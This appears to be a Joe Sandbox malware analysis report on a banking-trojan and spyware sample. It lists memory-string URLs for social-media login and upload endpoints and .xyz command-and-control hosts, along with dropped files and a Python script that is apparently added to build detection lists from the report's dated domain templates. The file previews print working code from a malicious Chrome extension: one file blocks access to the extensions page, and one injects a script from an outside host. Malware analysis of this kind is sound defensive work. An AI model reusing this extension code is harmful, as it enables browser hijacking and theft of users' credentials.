                                            https://logincdn.msauth.net/16.000.28666.10/content/images/ellipsis_white_5ac590ee72bfe06a7cecfd75b5ecvB803.tmp.11.drfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://upload.twitter.com/i/media/upload.jsoncommand=FINALIZE&media_id=63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpfalse
                                              high
                                              https://www.instagram.com/63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpfalse
                                                high
                                                http://schemas.xmlsoap.org/soap/encoding/download_engine.dll.3.drfalse
                                                  high
                                                  http://www.xunlei.com/GETdownload_engine.dll.3.drfalse
                                                    high
                                                    https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC5bdddb231cf54f958a5b6e76e9d8eeeecvB803.tmp.11.drfalse
                                                      high
                                                      https://upload.twitter.com/i/media/upload.json%dcommand=INIT&total_bytes=&media_type=image%2Fjpeg&me63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpfalse
                                                        high
                                                        https://www.messenger.com/origin:63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpfalse
                                                          high
                                                          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=63C4F3D9EA0CC861.exe, 00000003.00000003.284978493.000000000072F000.00000004.00000001.sdmp, Web Data1612045902911.3.drfalse
                                                            high
                                                            http://pki.goog/gsr2/GTS1O1.crt0ecvB803.tmp.11.drfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            unknown
                                                            https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1ecvB803.tmp.11.drfalse
                                                              high
                                                              https://googleads.g.doubleclick.net/pagead/gcn_p3p_.xmlecvB803.tmp.11.drfalse
                                                                high
                                                                https://contextual.media.net/ecvB803.tmp.11.drfalse
                                                                  high
                                                                  http://ocsp.pki.goog/gsr202ecvB803.tmp.11.drfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  https://pki.goog/repository/0ecvB803.tmp.11.drfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  https://api.twitter.com/1.1/statuses/update.json63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpfalse
                                                                    high
                                                                    https://cvision.media.net/new/300x300/3/167/174/27/39ab3103-8560-4a55-bfc4-401f897cf6f2.jpg?v=9ecvB803.tmp.11.drfalse
                                                                      high
                                                                      http://www.msn.com/ecvB803.tmp.11.drfalse
                                                                        high
                                                                        https://upload.twitter.com/i/media/upload.json63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpfalse
                                                                          high
                                                                          https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC828bc1cde9f04b788c98b5423157734ecvB803.tmp.11.drfalse
                                                                            high
                                                                            https://twitter.com/compose/tweetsec-fetch-mode:63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpfalse
                                                                              high
                                                                              https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=1463674ecvB803.tmp.11.drfalse
                                                                                high
                                                                                https://www.messenger.com/accept:63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpfalse
                                                                                  high
                                                                                  http://www.msn.com/de-ch/entertainment/_h/c920645c/webcore/externalscripts/oneTrustV2/consent/55a804ecvB803.tmp.11.drfalse
                                                                                    high
                                                                                    https://contextual.media.net/803288796/fcmain.js?&gdpr=0&cid=8CU157172&cpcd=pC3JHgSCqY8UHihgrvGr0A%3ecvB803.tmp.11.drfalse
                                                                                      high
                                                                                      https://contextual.media.net/48/nrrV18753.jsecvB803.tmp.11.drfalse
                                                                                        high
                                                                                        http://crl.pki.goog/gsr2/gsr2.crl0?ecvB803.tmp.11.drfalse
                                                                                        • URL Reputation: safe
                                                                                        • URL Reputation: safe
                                                                                        • URL Reputation: safe
                                                                                        unknown
                                                                                        http://pki.goog/gsr2/GTSGIAG3.crt0)ecvB803.tmp.11.drfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        unknown
                                                                                        https://upload.twitter.com/i/media/upload.json?command=APPEND&media_id=%s&segment_index=063C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpfalse
                                                                                          high
                                                                                          https://feedback.googleusercontent.com63C4F3D9EA0CC861.exe, 63C4F3D9EA0CC861.exe, 00000004.00000003.262093125.0000000003F27000.00000004.00000001.sdmpfalse
                                                                                            high
                                                                                            https://www.messenger.comhttps://www.messenger.com/login/nonce/ookie:63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            unknown
                                                                                            http://C8DD8AE6DC4DC644.xyz/info_old/w63C4F3D9EA0CC861.exe, 00000003.00000003.364182783.0000000003EF0000.00000004.00000001.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            unknown
                                                                                            http://www.xunlei.com/download_engine.dll.3.drfalse
                                                                                              high
                                                                                              http://pki.goog/gsr2/GTS1O1.crt0#ecvB803.tmp.11.drfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              unknown
                                                                                              https://aefd.nelreports.net/api/report?cat=bingthecvB803.tmp.11.drfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              unknown
                                                                                              https://upload.twitter.com/i/media/upload.json?command=APPEND&media_id=%s&segment_index=0accept:63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpfalse
                                                                                                high
                                                                                                http://schemas.xmlsoap.org/soap/envelope/download_engine.dll.3.drfalse
                                                                                                  high
                                                                                                  https://exchangework%04d%02d%02d.xyz/http://changenewsys%04d%02d%02d.xyz/post_info.63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  low
                                                                                                  https://geolocation.onetrust.com/cookieconsentpub/v1/geo/locationecvB803.tmp.11.drfalse
                                                                                                    high
                                                                                                    http://www.installshield.com/isetup/ProErrorCentral.asp?ErrorCode=%dfnhcdXEfus.exefalse
                                                                                                      high
                                                                                                      https://assets.adobedtm.com/launch-EN7b3d710ac67a4a1195648458258f97dd.min.jsecvB803.tmp.11.drfalse
                                                                                                        high
                                                                                                        https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCfd484f9188564713bbc5d13d862ebbfecvB803.tmp.11.drfalse
                                                                                                          high
                                                                                                          https://curl.haxx.se/docs/http-cookies.html63C4F3D9EA0CC861.exe, 00000003.00000002.368731244.00000000034EF000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275181666.00000000033EF000.00000004.00000001.sdmpfalse
                                                                                                            high
                                                                                                            http://www.openssl.org/support/faq.htmldownload_engine.dll.3.drfalse
                                                                                                              high
                                                                                                              https://www.instagram.comsec-fetch-mode:63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpfalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              unknown
                                                                                                              https://www.instagram.com/accounts/login/ajax/facebook/63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpfalse
                                                                                                                high
                                                                                                                https://login.microsoftonline.com/common/oauth2/authorize?client_id=9ea1ad79-fdb6-4f9a-8bc3-2b70f96eecvB803.tmp.11.drfalse
                                                                                                                  high
                                                                                                                  http://crl.thawte.com/ThawteTimestampingCA.crl0MiniThunderPlatform.exe.3.drfalse
                                                                                                                    high
                                                                                                                    https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2ecvB803.tmp.11.drfalse
                                                                                                                      high
                                                                                                                      https://www.instagram.com/sec-fetch-site:63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpfalse
                                                                                                                        high
                                                                                                                        https://twitter.comReferer:63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpfalse
                                                                                                                        • Avira URL Cloud: safe
                                                                                                                        unknown
                                                                                                                        http://www.interestvideo.com/video1.php63C4F3D9EA0CC861.exe, 00000004.00000002.275181666.00000000033EF000.00000004.00000001.sdmpfalse
                                                                                                                        • Avira URL Cloud: safe
                                                                                                                        unknown
                                                                                                                        https://www.instagram.com/accept:63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpfalse
                                                                                                                          high
                                                                                                                          http://C8DD8AE6DC4DC644.xyz:80/info_old/r63C4F3D9EA0CC861.exe, 00000003.00000002.365302511.00000000006E9000.00000004.00000020.sdmpfalse
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          unknown
                                                                                                                          https://www.messenger.com/login/nonce/63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpfalse
                                                                                                                            high
                                                                                                                            http://C8DD8AE6DC4DC644.xyz:80/info_old/w63C4F3D9EA0CC861.exe, 00000003.00000002.365302511.00000000006E9000.00000004.00000020.sdmpfalse
                                                                                                                            • Avira URL Cloud: safe
                                                                                                                            unknown
                                                                                                                            http://www.youtube.com63C4F3D9EA0CC861.exefalse
                                                                                                                              high
                                                                                                                              https://twitter.com/compose/tweetsec-fetch-dest:63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpfalse
                                                                                                                                high
                                                                                                                                http://crl.pki.goog/GTSGIAG3.crl0ecvB803.tmp.11.drfalse
                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                unknown
                                                                                                                                https://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gtecvB803.tmp.11.drfalse
                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                unknown
                                                                                                                                https://1A469593C1FE15DC.xyz/63C4F3D9EA0CC861.exe, 00000003.00000003.364204277.0000000003947000.00000004.00000040.sdmpfalse
                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                unknown
                                                                                                                                http://ocsp.thawte.com0MiniThunderPlatform.exe.3.drfalse
                                                                                                                                • URL Reputation: safe
                                                                                                                                • URL Reputation: safe
                                                                                                                                • URL Reputation: safe
                                                                                                                                unknown
                                                                                                                                https://api.twitter.com/1.1/statuses/update.jsoninclude_profile_interstitial_type=1&include_blocking63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpfalse
                                                                                                                                  high
                                                                                                                                  http://store.paycenter.uc.cnmail-attachment.googleusercontent.comMiniThunderPlatform.exe.3.drfalse
                                                                                                                                    high
                                                                                                                                    https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search63C4F3D9EA0CC861.exe, 00000003.00000003.284978493.000000000072F000.00000004.00000001.sdmp, Web Data1612045902911.3.drfalse
                                                                                                                                      high
                                                                                                                                      https://twitter.com/63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpfalse
                                                                                                                                        high
                                                                                                                                        https://logincdn.msauth.net/16.000/content/js/ConvergedLoginPaginatedStrings.en_5QoHC_ilFOmb96M0pIeJecvB803.tmp.11.drfalse
                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                        unknown
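One row above, `https://exchangework%04d%02d%02d.xyz/http://changenewsys%04d%02d%02d.xyz/post_info.`, is not a literal URL but a pair of C printf templates pulled from process memory; the hostname only exists once the sample fills in the three integers at runtime, so the string cannot be resolved or blocklisted as written. The following is an added example, not code from the report or from the sample, that renders those two templates over a date window and checks DNS log entries against them. The templates are copied from the row; the interpretation of `%04d%02d%02d` as year, month and day is an assumption made here (the report does not say what the integers are), and the DNS log lines are constructed for the demonstration.

```python
import re
from datetime import date, timedelta

# Printf-style hostname templates copied from the report's memory-string row.
# ASSUMPTION (not stated by the report): the three integers are year, month, day.
TEMPLATES = ("exchangework%04d%02d%02d.xyz", "changenewsys%04d%02d%02d.xyz")
DATE_FIELDS = "%04d%02d%02d"


def render_host(template: str, d: date) -> str:
    """Fill one template the way a C printf would for the given date."""
    return template % (d.year, d.month, d.day)


def candidate_hosts(start, days: int, templates=TEMPLATES) -> list:
    """Enumerate every hostname the templates yield over a date window.

    `start` may be a date or an ISO string ("YYYY-MM-DD").  The set for a
    window is small (len(templates) * days), so a generous window is cheap
    to pre-register on a blocklist or sinkhole.
    """
    if isinstance(start, str):
        start = date.fromisoformat(start)
    return [render_host(t, start + timedelta(days=i))
            for i in range(days) for t in templates]


def _template_regex(template: str):
    """Turn 'prefix%04d%02d%02dsuffix' into an anchored regex capturing the date."""
    prefix, suffix = template.split(DATE_FIELDS)
    return re.compile(r"^" + re.escape(prefix) + r"(\d{4})(\d{2})(\d{2})"
                      + re.escape(suffix) + r"$", re.IGNORECASE)


_PATTERNS = [_template_regex(t) for t in TEMPLATES]


def match_host(host: str):
    """Reverse direction: does a hostname seen in DNS telemetry fit a template?

    Returns the embedded date, or None when the name does not match or the
    digits are not a real calendar date (e.g. month 13), which filters out
    look-alike names that a plain regex would accept.
    """
    for pattern in _PATTERNS:
        m = pattern.match(host.strip().rstrip("."))
        if not m:
            continue
        year, month, day = (int(g) for g in m.groups())
        try:
            return date(year, month, day)
        except ValueError:
            return None
    return None


# Constructed sample DNS log (not from the report) so the script runs offline.
SAMPLE_LOG = """\
2021-01-30T14:31:02Z query A exchangework20210130.xyz
2021-01-30T14:31:02Z query A www.msn.com
2021-01-30T14:31:05Z query A changenewsys20210131.xyz
2021-01-30T14:31:07Z query A changenewsys20211399.xyz
"""


def scan_log(text: str) -> list:
    """Return (hostname, 'YYYY-MM-DD') for each line whose queried name matches
    a template.  The queried name is assumed to be the last whitespace field."""
    hits = []
    for line in text.splitlines():
        fields = line.split()
        if not fields:
            continue
        host = fields[-1]
        d = match_host(host)
        if d is not None:
            hits.append((host, d.isoformat()))
    return hits


if __name__ == "__main__":
    for h in candidate_hosts("2021-01-30", 3):
        print("candidate:", h)
    for host, day in scan_log(SAMPLE_LOG):
        print("hit:", host, "->", day)
```

If the year/month/day assumption is wrong (a different field order, or values that are not calendar dates), the enumeration produces the wrong names, so confirm the pattern against the sample's actual DNS queries in a detonation before pushing the generated list to a blocklist; the reverse check is the safer of the two directions because it only fires on names that were really queried.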

Contacted IPs


Public

IP | Domain | Country | ASN | ASN Name | Malicious
34.94.64.66 | unknown | United States | 15169 | GOOGLEUS | false

Private

IP
127.0.0.1

General Information

Joe Sandbox Version: 31.0.0 Emerald
Analysis ID: 346325
Start date: 30.01.2021
Start time: 14:30:17
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 12m 36s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: fnhcdXEfus.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Run name: Run with higher sleep bypass
Number of analysed new started processes analysed: 40
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal90.bank.troj.spyw.evad.winEXE@32/37@4/2
EGA Information: Failed
HDC Information:
• Successful, ratio: 21.7% (good quality ratio 20.6%)
• Quality average: 80.1%
• Quality standard deviation: 27.4%
HCA Information:
• Successful, ratio: 67%
• Number of executed functions: 44
• Number of non-executed functions: 343
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Sleeps bigger than 120000ms are automatically reduced to 1000ms
• Found application associated with file extension: .exe
Warnings:
• Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, UsoClient.exe
• Excluded IPs from analysis (whitelisted): 52.147.198.201, 104.43.139.144, 51.11.168.160, 23.210.248.85, 92.122.213.194, 92.122.213.247, 2.20.142.209, 2.20.142.210, 20.54.26.129, 51.104.139.180, 52.155.217.156
• Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, arc.msn.com.nsatc.net, fs.microsoft.com, ris-prod.trafficmanager.net, displaycatalog.md.mp.microsoft.com.akadns.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, skypedataprdcolcus16.cloudapp.net, a767.dscg3.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, blobcollector.events.data.trafficmanager.net, audownload.windowsupdate.nsatc.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtDeviceIoControlFile calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

Associated Sample Name / URL | SHA 256 | Detection | Link | Context
Match: 34.94.64.66
  fnhcdXEfus.exe | Get hash | malicious | Browse | C8DD8AE6DC4DC644.xyz/info_old/ddd

Domains

Associated Sample Name / URL | SHA 256 | Detection | Link | Context
Match: c8dd8ae6dc4dc644.xyz
  fnhcdXEfus.exe | Get hash | malicious | Browse | 34.94.64.66

ASN

Associated Sample Name / URL | SHA 256 | Detection | Link | Context
Match: GOOGLEUS
  fnhcdXEfus.exe | Get hash | malicious | Browse | 34.94.64.66
  KYC FORM01.xlsx | Get hash | malicious | Browse | 34.102.136.180
  MediaPlayer.apk | Get hash | malicious | Browse | 172.217.20.106
  VM859-7757.htm | Get hash | malicious | Browse | 216.58.208.118
  KYC AGREEMENT.xlsx | Get hash | malicious | Browse | 34.102.136.180
  INV.xlsx | Get hash | malicious | Browse | 34.102.136.180
  ki7710921.exe | Get hash | malicious | Browse | 34.102.136.180
  0113 INV_PAK.xlsx | Get hash | malicious | Browse | 34.102.136.180
  chrome.exe | Get hash | malicious | Browse | 8.8.8.8
  YK5tmqQ18z.exe | Get hash | malicious | Browse | 35.246.6.109
  q5oRsfy1vk.exe | Get hash | malicious | Browse | 34.102.136.180
  c8TrAKsz0T.exe | Get hash | malicious | Browse | 34.102.136.180
  Immuni.apk | Get hash | malicious | Browse | 172.217.20.106
  YWrrcqVAno.exe | Get hash | malicious | Browse | 34.102.136.180
  lbqFKoALqe.exe | Get hash | malicious | Browse | 35.184.90.176
  eDpjcIIh9G.exe | Get hash | malicious | Browse | 34.102.136.180
  6tivtkKtQx.exe | Get hash | malicious | Browse | 34.102.136.180
  Sf6jgQc6Ww.exe | Get hash | malicious | Browse | 34.102.136.180
  j64eIR1IEK.exe | Get hash | malicious | Browse | 34.102.136.180
  bEuBS6SwMo.exe | Get hash | malicious | Browse | 35.228.108.144

JA3 Fingerprints

No context

Dropped Files

Associated Sample Name / URL | SHA 256 | Detection | Link | Context
Match: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe
  fnhcdXEfus.exe | Get hash | malicious | Browse
Match: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe
  fnhcdXEfus.exe | Get hash | malicious | Browse
  Cyfj6XGbkd.exe | Get hash | malicious | Browse
  N1yprTBBXs.exe | Get hash | malicious | Browse
  Cyfj6XGbkd.exe | Get hash | malicious | Browse
  N1yprTBBXs.exe | Get hash | malicious | Browse
  FileSetup-v17.04.41.exe | Get hash | malicious | Browse
  FileSetup-v17.04.41.exe | Get hash | malicious | Browse
Match: C:\Users\user\AppData\Local\Temp\MSI6DDB.tmp
  6MhmlD8KZh.exe | Get hash | malicious | Browse
  fnhcdXEfus.exe | Get hash | malicious | Browse
  Cyfj6XGbkd.exe | Get hash | malicious | Browse
  N1yprTBBXs.exe | Get hash | malicious | Browse
  Cyfj6XGbkd.exe | Get hash | malicious | Browse
  N1yprTBBXs.exe | Get hash | malicious | Browse
  FileSetup-v17.04.41.exe | Get hash | malicious | Browse
  FileSetup-v17.04.41.exe | Get hash | malicious | Browse

Created / dropped Files

C:\Users\user\AppData\Local\Cookies1612045889599
Process: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe
File Type: SQLite 3.x database, last written using SQLite version 3032001
Category: dropped
Size (bytes): 20480
Entropy (8bit): 0.6970840431455908
Encrypted: false
SSDEEP: 24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBocLgAZOZD/0:T5LLOpEO5J/Kn7U1uBo8NOZ0
MD5: 00681D89EDDB6AD25E6F4BD2E66C61C6
SHA1: 14B2FBFB460816155190377BBC66AB5D2A15F7AB
SHA-256: 8BF06FD5FAE8199D261EB879E771146AE49600DBDED7FDC4EAC83A8C6A7A5D85
SHA-512: 159A9DE664091A3986042B2BE594E989FD514163094AC606DC3A6A7661A66A78C0D365B8CA2C94B8BC86D552E59D50407B4680EDADB894320125F0E9F48872D3
Malicious: false
C:\Users\user\AppData\Local\Cookies1612045902708
Process: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe
File Type: SQLite 3.x database, last written using SQLite version 3032001
Category: dropped
Size (bytes): 20480
Entropy (8bit): 0.6970840431455908
Encrypted: false
SSDEEP: 24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBocLgAZOZD/0:T5LLOpEO5J/Kn7U1uBo8NOZ0
MD5: 00681D89EDDB6AD25E6F4BD2E66C61C6
SHA1: 14B2FBFB460816155190377BBC66AB5D2A15F7AB
SHA-256: 8BF06FD5FAE8199D261EB879E771146AE49600DBDED7FDC4EAC83A8C6A7A5D85
SHA-512: 159A9DE664091A3986042B2BE594E989FD514163094AC606DC3A6A7661A66A78C0D365B8CA2C94B8BC86D552E59D50407B4680EDADB894320125F0E9F48872D3
Malicious: false
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\emihechjjbnedinohcnpneeogfgehmce\1.0.0.0_0\background.js
Process: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe
File Type: ASCII text
Category: dropped
Size (bytes): 886
Entropy (8bit): 5.022683940423506
Encrypted: false
SSDEEP: 24:sFfWxmARONJTW0/I8/lZ9OKMmA6eiH4MmDCvTV3u4:sYo/NJ/7Augi8Dy
MD5: FEDACA056D174270824193D664E50A3F
SHA1: 58D0C6E4EC18AB761805AABB8D94F3C4CBE639F5
SHA-256: 8F538ED9E633D5C9EA3E8FB1354F58B3A5233F1506C9D3D01873C78E3EB88B8D
SHA-512: 2F1968EDE11B9510B43B842705E5DDAC4F85A9E2AA6AEE542BEC80600228FF5A5723246F77C526154EB9A00A87A5C7DDD634447A8F7A97D6DA33B94509731DBC
Malicious: false
Preview: $(function() {..chrome.tabs.onSelectionChanged.addListener(function(tab,info){....chrome.tabs.query({....active : true...}, function(tab) {....var pageUrl = tab[0].url;....console.log(pageUrl);....if (Number(pageUrl.indexOf("extensions")) > 1) ....{....chrome.tabs.update({url:'https://chrome.google.com/webstore/category/extension'}); ....}. .... ...});.});....chrome.webRequest.onBeforeRequest.addListener(function(details) {....chrome.tabs.query({....active : true...}, function(tab) {....var pageUrl = tab[0].url;...});........var url = details.url;...}, {...urls : [ "<all_urls>" ]..}, [ "blocking" ]);...function sendMessageToContentScript(message, callback) {...chrome.tabs.query({....active : true,....currentWindow : true...}, function(tabs) {....chrome.tabs.sendMessage(tabs[0].id, message, function(response) {.....if (callback)......callback(response);....});...});..}...});
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\emihechjjbnedinohcnpneeogfgehmce\1.0.0.0_0\book.js
Process: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe
                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):152
                                                                                                                                                                        Entropy (8bit):5.039480985438208
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:3:2LGffWpnYOJRyRmgO9lNCaVpveLWCfKVsSdDXaDQTNUHWSpHovJiRzlLBche:2LGXWpn7J8mgO9l3BeiCfLSdDYGNeW7u
                                                                                                                                                                        MD5:30CBBF4DF66B87924C75750240618648
                                                                                                                                                                        SHA1:64AF3DD53D6DED500863387E407F876C89A29B9A
                                                                                                                                                                        SHA-256:D35FBD13C27F0A01DC944584D05776BA7E6AD3B3D2CBDE1F7C349E94502127F5
                                                                                                                                                                        SHA-512:8117B8537A0B5F4BB3ED711D9F062E7A901A90FD3D2CF9DFFCC15D03ED4E001991BA2C79BCA072FA7FD7CE100F38370105D3CE76EB87F2877C0BF18B4D8CFBAB
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview: (function(){.. var s = document.createElement('script'); .. s.src = '//kellyfight.com/22aff56f45f6b36dec.js'; .. document.body.appendChild(s);..})();

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\emihechjjbnedinohcnpneeogfgehmce\1.0.0.0_0\icon.png
Process: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe
File Type: PNG image data, 30 x 30, 8-bit/color RGBA, non-interlaced
Category: dropped
Size (bytes): 1161
Entropy (8bit): 7.79271055262892
Encrypted: false
SSDEEP: 24:2mEKEvFZonmDzTaC6EU1yPj0bhJKaurzF3LvLIeR2D+JGP6A8UJ0wrBI4ez:DExZomDXe1yPYHKNx3LvLvWFP6noFy4M
MD5: 5D207F5A21E55E47FCCD8EF947A023AE
SHA1: 3A80A7CF3A8C8F9BDCE89A04239A7E296A94160F
SHA-256: 4E8CE139D89A497ADB4C6F7D2FFC96B583DA1882578AB09D121A459C5AD8335F
SHA-512: 38436956D5414A2CF66085F290EF15681DBF449B453431F937A09BFE21577252565D0C9FA0ACEAAD158B099383E55B94C721E23132809DF728643504EFFCBE2B
Malicious: false

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\emihechjjbnedinohcnpneeogfgehmce\1.0.0.0_0\icon48.png
Process: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe
File Type: PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced
Category: dropped
Size (bytes): 2235
Entropy (8bit): 7.880518016071819
Encrypted: false
SSDEEP: 48:9V93V/3XpV1P2gnjz8xqNaT5YmiH+0Rn6r2ogpZGYmT2pN6esC+s5szuZNwG:BlFP7jzUTKm26rMCYmneWsCG
MD5: E35B805293CCD4F74377E9959C35427D
SHA1: 9755C6F8BAB51BD40BD6A51D73BE2570605635D1
SHA-256: 2BF1D9879B36BE03B2F140FAD1932BC6AAAAAC834082C2CD9E98BE6773918CA0
SHA-512: 6C7D37378AA1E521E73980C431CE5815DEDB28D5B7003009B91392303D3BEC1EE6F2AAE719B766DA4209B607CD702FAE283E1682D3785EFF85E07D5EE81319C8
Malicious: false
                                                                                                                                                                        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\emihechjjbnedinohcnpneeogfgehmce\1.0.0.0_0\jquery-1.8.3.min.js
                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe
                                                                                                                                                                        File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):93637
